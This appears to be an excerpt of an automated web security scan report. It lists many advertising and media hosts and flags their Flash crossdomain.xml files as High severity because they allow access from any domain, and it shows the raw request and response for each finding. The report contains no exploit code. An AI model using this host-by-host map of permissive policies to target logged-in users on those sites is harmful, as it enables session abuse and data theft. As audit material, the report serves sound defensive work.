http://pixel.fetchback.com/crossdomain.xml
http://pixel.mathtag.com/crossdomain.xml
http://pixel.quantserve.com/crossdomain.xml
http://pro.cnbc.com/crossdomain.xml
http://r.casalemedia.com/crossdomain.xml
http://rcv-srv03.inplay.tubemogul.com/crossdomain.xml
http://receive.inplay.tubemogul.com/crossdomain.xml
http://reviews.gillettevenus.com/crossdomain.xml
http://s0.2mdn.net/crossdomain.xml
http://search.twitter.com/crossdomain.xml
http://secure-us.imrworldwide.com/crossdomain.xml
http://services.plymedia.com/crossdomain.xml
http://speed.pointroll.com/crossdomain.xml
http://static.plymedia.com/crossdomain.xml
http://static.plymedia.com.s3.amazonaws.com/crossdomain.xml
http://stats.deloitte.com/crossdomain.xml
http://statse.webtrendslive.com/crossdomain.xml
http://tags.bluekai.com/crossdomain.xml
http://tf.nexac.com/crossdomain.xml
http://ttwbs.channelintelligence.com/crossdomain.xml
http://wingateweb.112.2o7.net/crossdomain.xml
http://ad.wsod.com/crossdomain.xml
http://adadvisor.net/crossdomain.xml
http://ads.adsonar.com/crossdomain.xml
http://ads1.msn.com/crossdomain.xml
http://adx.g.doubleclick.net/crossdomain.xml
http://assets1.csc.com/crossdomain.xml
http://blogs.oracle.com/crossdomain.xml
http://bstats.adbrite.com/crossdomain.xml
http://channelsun.sun.com/crossdomain.xml
https://cms.paypal.com/crossdomain.xml
http://cnbc.com/crossdomain.xml
http://cvs.shoplocal.com/crossdomain.xml
http://data.cnbc.com/crossdomain.xml
http://developers.facebook.com/crossdomain.xml
http://disqus.com/crossdomain.xml
http://edge.sapient.com/crossdomain.xml
http://event.on24.com/crossdomain.xml
https://event.on24.com/crossdomain.xml
http://executivevision.cnbc.com/crossdomain.xml
http://js.adsonar.com/crossdomain.xml
http://login.cnbc.com/crossdomain.xml
https://login.cnbc.com/crossdomain.xml
http://m.cnbc.com/crossdomain.xml
http://media.cnbc.com/crossdomain.xml
http://msnbcmedia.msn.com/crossdomain.xml
http://optimized-by.rubiconproject.com/crossdomain.xml
http://pagead2.googlesyndication.com/crossdomain.xml
http://pi.pardot.com/crossdomain.xml
http://quote.cnbc.com/crossdomain.xml
http://rd.rlcdn.com/crossdomain.xml
http://search.cnbc.com/crossdomain.xml
http://server.iad.liveperson.net/crossdomain.xml
http://snas.nbcuni.com/crossdomain.xml
https://support.oracle.com/crossdomain.xml
http://symlookup.cnbc.com/crossdomain.xml
http://videometa.cnbc.com/crossdomain.xml
http://w.sharethis.com/crossdomain.xml
http://wd.sharethis.com/crossdomain.xml
http://www.apture.com/crossdomain.xml
http://www.atg.com/crossdomain.xml
https://www.atg.com/crossdomain.xml
http://www.cnbc.com/crossdomain.xml
http://www.csc.com/crossdomain.xml
http://www.deloitte.com/crossdomain.xml
http://www.facebook.com/crossdomain.xml
http://www.fetchback.com/crossdomain.xml
http://www.marykay.com/crossdomain.xml
http://www.msnbc.msn.com/crossdomain.xml
http://www.oracle.com/crossdomain.xml
http://www.oracleimg.com/crossdomain.xml
http://www.sapient.com/crossdomain.xml
http://www.youtube.com/crossdomain.xml
http://www2.znode.com/crossdomain.xml
http://1215.ic-live.com/crossdomain.xml
http://admin5.testandtarget.omniture.com/crossdomain.xml
http://api.twitter.com/crossdomain.xml
https://docs.google.com/crossdomain.xml
http://search.oracle.com/crossdomain.xml
http://sophelle.app5.hubspot.com/crossdomain.xml
http://sun.edgeboss.net/crossdomain.xml
http://twitter.com/crossdomain.xml
http://www.covergirl.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

4.1. http://a.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/xml
Content-Length: 102
Connection: Close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.2. http://a1.interclick.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a1.interclick.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: a1.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Wed, 10 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
ETag: "df382cb6d57cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Xonnection: Xeep-alive
Content-Length: 225

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.3. http://action.mathtag.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://action.mathtag.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: action.mathtag.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Content-Length: 215
Date: Tue, 06 Sep 2011 16:45:41 GMT
Accept-Ranges: bytes
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

<allow-access-from domain="*" />

</cross-
...[SNIP]...

4.4. http://ad.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.5. http://admin.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://admin.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: admin.brightcove.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "4fbbc6624625a7f4c2704c08908b31df:1283167753"
Last-Modified: Mon, 30 Aug 2010 11:29:13 GMT
Accept-Ranges: bytes
Content-Length: 386
Content-Type: application/xml
Cache-Control: max-age=1200
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.6. http://ads.pointroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.pointroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:15f2"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:09 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.7. http://ads.rnmd.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.rnmd.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.rnmd.net

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:07:48 GMT
Server: Apache/2.2.3 (CentOS)
Vary: Cookie
Last-Modified: Fri, 26 Aug 2011 16:48:34 GMT
ETag: "150291-80-4ab6b50e6dc80"
Accept-Ranges: bytes
Content-Length: 128
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.8. http://afe.specificclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://afe.specificclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: afe.specificclick.net

Response

HTTP/1.1 200 OK
Server: WebStar 1.0
Content-Type: text/xml
Content-Length: 194
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.9. http://ajax.googleapis.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ajax.googleapis.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ajax.googleapis.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 23:17:09 GMT
Date: Mon, 05 Sep 2011 23:17:09 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 58526

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

4.10. http://altfarm.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: altfarm.mediaplex.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"204-1158796163000"
Last-Modified: Wed, 20 Sep 2006 23:49:23 GMT
Content-Type: text/xml
Content-Length: 204
Date: Tue, 06 Sep 2011 15:37:49 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.11. http://at.amgdgt.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://at.amgdgt.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.amgdgt.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:37:51 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 21 May 2010 08:32:40 GMT
ETag: "308cb3d-12e-4871688bd9a00"
Accept-Ranges: bytes
Content-Length: 302
Cache-Control: max-age=21600
Expires: Tue, 06 Sep 2011 21:37:51 GMT
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-access-from domain="all" />
...[SNIP]...

4.12. http://b.scorecardresearch.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

4.13. http://c.betrad.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.betrad.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Tue, 06 Sep 2011 14:59:07 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

4.14. http://c.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 50.23.123.106
X-BC-Connecting-IP: 50.23.123.106
Last-Modified: Tue, 02 Aug 2011 23:56:42 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Tue, 06 Sep 2011 16:12:55 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

4.15. http://cache.specificmedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cache.specificmedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cache.specificmedia.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:08 GMT
Server: PWS/1.7.3.3
X-Px: ms lax-agg-n18 ( lax-agg-n43), ht-d lax-agg-n43.panthercdn.com
Cache-Control: max-age=604800
Expires: Fri, 09 Sep 2011 01:38:58 GMT
Age: 393610
Content-Length: 194
Content-Type: text/xml
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

4.16. http://cdn.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.gigya.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 31 Mar 2011 15:00:41 GMT
ETag: "80b2ea66b4efcb1:0"
Server: Microsoft-IIS/7.5
X-Server: web103
Cache-Control: max-age=86400
Date: Tue, 06 Sep 2011 14:56:31 GMT
Content-Length: 355
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="mas
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.17. http://cdn5.tribalfusion.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn5.tribalfusion.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn5.tribalfusion.com

Response

HTTP/1.0 200 OK
P3p: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
Content-Length: 102
X-Reuse-Index: 18
Content-Type: text/xml
Date: Tue, 06 Sep 2011 14:59:04 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.18. http://clk.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://clk.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:22 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.19. http://content.links.channelintelligence.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.links.channelintelligence.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: content.links.channelintelligence.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 09 Nov 2007 15:45:10 GMT
ETag: "eb20ee82e722c81:2813"
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:40 GMT
Content-Length: 206
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...

4.20. http://content.plymedia.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://content.plymedia.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: content.plymedia.com

Response

HTTP/1.0 200 OK
Cache-Control: public, max-age=25
Content-Type: text/xml; charset=utf-8
Expires: Tue, 06 Sep 2011 16:13:26 GMT
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:13:00 GMT
Content-Length: 682
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.21. http://core.insightexpressai.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://core.insightexpressai.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: core.insightexpressai.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Tue, 02 Feb 2010 21:21:42 GMT
ETag: "0f7cfb64da4ca1:0"
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Tue, 06 Sep 2011 14:57:00 GMT
Content-Length: 139
Connection: close
Cache-Control: no-store

<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

4.22. http://d.adroll.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.adroll.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.adroll.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 06 Sep 2011 15:32:14 GMT
Content-Type: text/xml
Content-Length: 201
Last-Modified: Wed, 24 Aug 2011 20:02:16 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.23. http://d.ads.readwriteweb.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d.ads.readwriteweb.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d.ads.readwriteweb.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:46 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "49c238-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.24. http://d1.openx.org/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d1.openx.org
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:06:27 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "78412-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/xml
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.25. http://d7.zedo.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 248
Content-Type: application/xml
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6034
Date: Tue, 06 Sep 2011 15:15:56 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

4.26. http://fls.doubleclick.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://fls.doubleclick.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Tue, 06 Sep 2011 00:24:57 GMT
Expires: Wed, 07 Sep 2011 00:24:57 GMT
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 60104

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.27. http://goku.brightcove.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://goku.brightcove.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: goku.brightcove.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:13:00 GMT
Server: Apache
Last-Modified: Wed, 04 Nov 2009 14:35:23 GMT
Content-Length: 116
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.28. http://gscounters.gigya.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://gscounters.gigya.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: gscounters.gigya.com

Response

HTTP/1.1 200 OK
Content-Length: 341
Content-Type: text/xml
Last-Modified: Tue, 08 Sep 2009 07:27:09 GMT
Accept-Ranges: bytes
ETag: "c717c7c65530ca1:2b9b"
Server: Microsoft-IIS/6.0
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
x-server: web202
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 14:56:33 GMT
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...
<allow-access-from domain="*" to-ports="80" />
...[SNIP]...
<allow-access-from domain="*" to-ports="443" secure="false" />
...[SNIP]...

4.29. http://ib.adnxs.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 07-Sep-2011 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=-1; path=/; expires=Mon, 05-Sep-2016 15:32:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

4.30. http://img-cdn.mediaplex.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://img-cdn.mediaplex.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: img-cdn.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Content-Type: text/x-cross-domain-policy
Date: Tue, 06 Sep 2011 15:37:46 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

4.31. http://imp.fetchback.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://imp.fetchback.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: imp.fetchback.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:00:16 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Sep 2009 11:29:17 GMT
Accept-Ranges: bytes
Content-Length: 213
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross-do
...[SNIP]...

4.32. http://intelligence.marykay.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://intelligence.marykay.com
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www28
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>

4.33. http://js.revsci.net/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/crossdomain.xml

Issue detail

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:45:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-po
...[SNIP]...
